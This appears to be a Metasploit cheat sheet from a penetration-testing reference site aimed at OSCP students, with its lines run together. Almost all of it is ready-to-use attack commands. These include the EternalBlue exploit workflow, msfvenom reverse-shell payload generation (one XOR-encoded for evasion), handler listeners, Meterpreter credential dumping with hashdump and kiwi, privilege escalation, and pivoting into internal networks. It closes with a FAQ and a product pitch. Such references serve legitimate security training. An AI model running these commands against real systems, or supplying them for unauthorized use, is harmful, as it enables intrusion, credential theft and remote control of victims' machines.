# Start & Database Setup
Initialise the PostgreSQL database first — it stores hosts, services and loot, and makes searching much faster.
sudo msfdb initmsfconsole -qdb_statusdb_nmap -sV -sC 10.10.10.5hosts; servicesworkspace -a client_x# Search & Select Modules
Find the right module fast with filters. Metasploit ships with 2000+ exploits and thousands of auxiliary modules.
search eternalbluesearch type:exploit platform:windows cve:2021search name:smb type:auxiliaryuse 0info# The Exploit Workflow
The core loop: use → set options → check → exploit. Same pattern for every module.
use exploit/windows/smb/ms17_010_eternalblueshow optionsset RHOSTS 10.10.10.5set LHOST tun0set LPORT 443checkexploit -j# Payloads
Pick a payload that matches the target and your network. Staged (/) needs a stager; stageless (_) is a single self-contained blob.
show payloadsset payload windows/x64/meterpreter/reverse_tcpset payload windows/x64/meterpreter_reverse_httpsset payload linux/x64/shell_reverse_tcpwindows/.../reverse_tcp) sends a small stager first; stageless (meterpreter_reverse_tcp) is one blob — more reliable over flaky links.# multi/handler — Catch Any Shell
Use the handler to receive a connection from a payload you generated with msfvenom or dropped manually.
use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; runmsfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; run"set ExitOnSession false# msfvenom — Generate Payloads
Build standalone payload files in any format. Catch them with a matching multi/handler.
msfvenom -l payloadsmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -o shell.exemsfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o shell.elfmsfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f raw -o shell.phpmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -e x64/xor_dynamic -i 5 -o enc.exemsfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=443 -o app.apk# Meterpreter Commands
Once you have a Meterpreter session, these are the everyday commands.
sysinfo; getuidgetsystemgetprivshashdumpupload /tmp/winPEAS.exe C:\\Windows\\Temp\\download C:\\Users\\admin\\Desktop\\proof.txtshellmigrate -N explorer.exeload kiwi; creds_all# Session Management
Juggle multiple shells and upgrade basic shells to Meterpreter.
sessions -lsessions -i 1Ctrl+Zsessions -u 2sessions -c "whoami" -i 1sessions -K# Post-Exploitation Modules
Run post modules against an existing session for enumeration and persistence.
run post/multi/recon/local_exploit_suggesterrun post/windows/gather/enum_logged_on_usersrun post/windows/manage/migraterun post/multi/manage/shell_to_meterpreter# Pivoting
Use a compromised host as a gateway into internal subnets you can't reach directly.
run autoroute -s 10.10.20.0/24use post/multi/manage/autoroute; set SESSION 1; runuse auxiliary/server/socks_proxy; set SRVPORT 1080; run -jproxychains nmap -sT -Pn 10.10.20.10portfwd add -l 3389 -p 3389 -r 10.10.20.10❓ Metasploit FAQ
The most widely used pentest framework — thousands of exploits, payloads, auxiliary and post modules behind one console (msfconsole). You search a module, set its options (RHOSTS, LHOST) and run it.
msfconsole is the interactive console for running modules. msfvenom generates standalone payload files (exe, elf, php, apk). You often build with msfvenom and catch with a multi/handler.
Metasploit's advanced in-memory payload. It gives file transfer, getsystem, hashdump, screen capture, keylogging and pivoting — all without writing to disk, so it's stealthier than a plain shell.
use exploit/multi/handler, set payload to match your msfvenom payload, set LHOST/LPORT, then run. It catches the incoming connection and opens a session.
sessions -l lists, sessions -i ID interacts, Ctrl+Z backgrounds. Run without interacting via sessions -c 'whoami' -i ID, upgrade a shell with sessions -u ID.
From Meterpreter, run autoroute -s 10.10.20.0/24, then use auxiliary scanners internally, or start auxiliary/server/socks_proxy and point proxychains at it.
You may use Metasploit/Meterpreter on only one target of your choice; it's restricted elsewhere, so master manual exploitation. msfvenom for payloads is generally allowed — always check the current rules.
On Kali: sudo apt update && sudo apt install metasploit-framework. From the Rapid7 installer, use msfupdate. Then run msfconsole and reload_all to rebuild the module cache.
📚 Related Resources
- Reverse Shell Cheatsheet — Non-Metasploit payloads for when msf is restricted (OSCP)
- Nmap Cheatsheet — Feed db_nmap results straight into your Metasploit workspace
- Windows Privilege Escalation Cheatsheet — Escalate after getsystem doesn't work
- OSCP Cheatsheet — Know the exam's one-Metasploit-target rule
Turn your Metasploit sessions into a professional PDF report. AI auto-fills CVE, CVSS and severity.
Want all 12,020+ commands?
This Metasploit cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.
Start free →